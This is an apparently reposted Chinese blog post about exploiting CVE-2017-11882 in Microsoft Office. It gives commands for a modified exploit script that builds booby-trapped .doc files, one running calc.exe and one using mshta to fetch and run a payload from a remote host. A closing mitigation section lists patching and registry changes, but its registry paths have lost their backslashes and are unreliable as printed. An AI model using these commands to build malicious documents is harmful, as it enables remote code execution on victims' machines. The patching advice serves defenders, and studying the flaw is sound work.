CVE-2017-11882利用

Posted anbuxuan

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2017-11882利用相关的知识,希望对你有一定的参考价值。

===Kali下游类似模块,不太稳定

最近这段时间CVE-2017-11882挺火的。关于这个漏洞可以看看这里:隐藏17年的Office远程代码执行漏洞POC样本分析(CVE-2017-11882)

今天在twitter上看到有人共享了一个POC,twitter地址poc地址,后来又看到有人共享了一个项目CVE-2017-11882,简单看了一下这个项目,通过对rtf文件的修改来实现命令执行的目的,但是有个缺陷就是,这个项目使用的是使用webdav的方式来执行远程文件的,使用起来可能并不容易,所以就对此文件进行了简单的修改,具体项目地址如下:GIT:CVE-2017-11882 。
使用方式很简单,如果要执行命令

1
 
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

 

demo

 
技术图片

 

关于怎么进一步利用,可以参考之前写的《windows命令执行漏洞不会玩? 看我!》,由于有长度的限制,这里可以采用mshta的方式来执行。构造的命令如下:

1
 
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

 

最终效果如下:
技术图片

解决方案:

1、微软已经对此漏洞做出了修复。

1
2
3
 
(1)下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882  更新补丁进行修补

(2)开启Windows Update功能,定期对系统进行自动更新

 

2、由于该公式编辑器已经17年未做更新,可能存在大量安全漏洞,建议在注册表中取消该模块的注册。

按下Win+R组合键,打开cmd.exe

对应office版本修改以下注册表路径以后,输入:

1
2
3
 
reg add "HKLMSOFTWAREMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000- 0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLMSOFTWAREWow6432NodeMicrosoftOfficeXX.XCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

 

------本文结束,感谢阅读------

以上是关于CVE-2017-11882利用的主要内容,如果未能解决你的问题,请参考以下文章

[漏洞复现] CVE-2017-11882 通杀所有office版本

CVE-2017-11882漏洞复现

cve-2017-11882生成office恶意文件

隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

[漏洞复现] CVE-2017-11882 通杀所有Office版本

Office CVE-2017-11882复现